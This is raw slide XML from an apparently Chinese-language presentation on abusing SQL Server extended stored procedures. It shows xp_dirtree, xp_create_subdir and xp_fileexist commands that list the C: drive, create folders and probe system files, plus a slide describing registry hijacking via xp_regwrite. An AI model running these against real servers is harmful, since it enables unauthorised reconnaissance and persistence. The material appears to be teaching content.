          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035189" y="3580311"/>
            <a:ext cx="5578516" cy="2435243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25576826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1"/>
            <a:ext cx="11035409" cy="2339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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038555" y="3980034"/>
            <a:ext cx="3642389" cy="1600432"/>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en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>盘所有文件和目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\',1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>盘所有目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_dirtree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\',1,1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>显示指定目录下的目录和文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAEC0F5E-D820-4F0F-8768-309D8B5F0B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6494344" y="2981732"/>
            <a:ext cx="4659101" cy="3445385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11773402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1"/>
            <a:ext cx="11035409" cy="2339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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create_subdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038555" y="3980034"/>
            <a:ext cx="3642389" cy="61554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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_create_subdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>用于创建子目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_create_subdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\test';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0272C9D-7998-4E40-BA83-49C8C4033B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539885" y="3461646"/>
            <a:ext cx="6073820" cy="2371743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40579560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1"/>
            <a:ext cx="11035409" cy="2339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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744772" y="4122030"/>
            <a:ext cx="4205475" cy="8617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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>用于判断文件是否存在，该存储过程返回的结果集有一行数据，三个字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\windows\win.ini';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D379DE1-A91F-4E78-BA8B-BB19ADEFEA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5699393" y="3646098"/>
            <a:ext cx="5851568" cy="1635137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22921918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2"/>
            <a:ext cx="11035409" cy="48013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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储过程对注册表进行修改，替换成任意值，造成镜像劫持。</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lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>前提条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.未禁止注册表编辑（即写入功能）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.xp_regwrite启用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714479" y="5509510"/>
            <a:ext cx="8763040" cy="615547"/>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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
